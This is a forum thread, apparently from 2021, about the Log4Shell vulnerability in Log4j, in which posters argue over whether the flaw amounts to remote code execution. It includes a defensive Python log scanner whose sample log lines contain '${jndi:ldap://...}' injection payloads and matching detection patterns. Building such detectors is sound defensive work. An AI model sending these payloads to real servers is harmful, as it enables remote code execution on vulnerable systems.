Posted on 12/12/2021 9:08:33 PM PST by blueplum
The direct link to BGR:
https://bgr.com/tech/internet-is-scrambling-to-fix-log4shell-the-worst-hack-in-history/
MSN did not author this article.
What idiot thought it would be a good idea to have RCE capability in a logging utility?
It’s not normally there.
This is a vulnerability that makes that happen to the OS.
tech-ping
I’ve always hated JAVA.
>>It’s not normally there.
Wrong. That “feature” was deliberately coded.
From a different article on it:
The bug, now officially denoted CVE-2021-44228, involves sending a request to a vulnerable server in which you include some data – for example, an HTTP header – that you expect (or know) the server will write to its logfile.
But you booby-trap that data so that the server, while wrangling the data into a format suitable for logging, kicks off a web download as an integral part of constructing the needed log entry.
And not just any old download: if the data that comes back is a valid Java program (a .class file, in the jargon), then the server runs that file to “help” it generate the logging data.
The trick is that, by default, unpatched versions of the Log4j library permit logging requests to trigger general-purpose LDAP (directory services) searches, as well as various other online lookups.
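A defender-side illustration of the mechanism quoted above, added here and not part of the thread or the article it quotes: a scanner that flags Log4j-style `${...}` lookup expressions in the client-controlled fields of web-server access logs. The log format, sample lines and addresses are constructed for the example.

```python
import re

# Constructed sample lines in Apache/Nginx "combined" log format (not from the thread).
# 203.0.113.0/24 and 198.51.100.0/24 are documentation address ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.7 - - [10/Dec/2021:14:02:20 +0000] "GET /item?price=$5 HTTP/1.1" 200 99 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:14:02:25 +0000] "GET /${jndi:ldap://198.51.100.7/x} HTTP/1.1" 404 0 "-" "curl/7.79.1"',
]

# Fields of the combined format that a client controls: request line, Referer, User-Agent.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# A Log4j lookup expression has no legitimate reason to appear in client-supplied data,
# so any "${...}" is worth an alert; a "jndi:" prefix is the one the quoted article describes.
LOOKUP_RE = re.compile(r'\$\{[^}]*\}')
JNDI_RE = re.compile(r'jndi:', re.IGNORECASE)


def scan_line(line):
    """Return (client_ip, field, kind, expression) for every lookup found in one log line."""
    m = COMBINED_RE.match(line)
    if not m:
        return []  # unparseable line; a real pipeline would count these separately
    findings = []
    for field in ("request", "referer", "agent"):
        for hit in LOOKUP_RE.finditer(m.group(field)):
            kind = "jndi-lookup" if JNDI_RE.search(hit.group(0)) else "other-lookup"
            findings.append((m.group("ip"), field, kind, hit.group(0)))
    return findings


def scan_log(lines):
    """Flatten findings across a whole log; a plain "$5" in a URL does not trigger."""
    return [f for line in lines for f in scan_line(line)]


if __name__ == "__main__":
    for ip, field, kind, expr in scan_log(SAMPLE_LOG):
        print(f"{ip}\t{field}\t{kind}\t{expr}")
```

Matches tell you which client and which header carried the lookup so the request can be blocked at the edge and the affected hosts checked, but the only real fix is upgrading the vulnerable Log4j library, as the quoted article notes.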
You just proved it's not performing remote code execution. There's nothing in Log4j that lets you run any code. It does a lookup, but that is not executed code or arbitrary code.
>>There’s nothing in Log4j that lets you run any code.
Did you miss THIS?
“And not just any old download: if the data that comes back is a valid Java program (a .class file, in the jargon), then the server runs that file to “help” it generate the logging data.”
Downloading and running arbitrary code seems like a bad idea.
Again, log4j does not ever run such code. It does now, only under an exploit.
Ummmmm... that’s what the entire panic is over. A security flaw means that Log4J will retrieve client-supplied URLs including executing Java code. That’s not good.
it's a wonderful world
https://www.reuters.com/markets/europe/exclusive-imf-10-countries-simulate-cyber-attack-global-financial-system-2021-12-09/?fbclid=IwAR3fiRQ05BTXjvfc5N_hFlNh0yhH5PbmIe8zCzsfzLMw6L6cKZXUrr6prI0
No.
Thnx for providing such a clear explanation for a semi-techie like me!
I was thinking the same thing. What purpose could it serve?
It’s been impossible here to create new ebay listings via desktop since Friday (apparently ok via mobile apps), wonder if there could be a connection?
bookmark
No.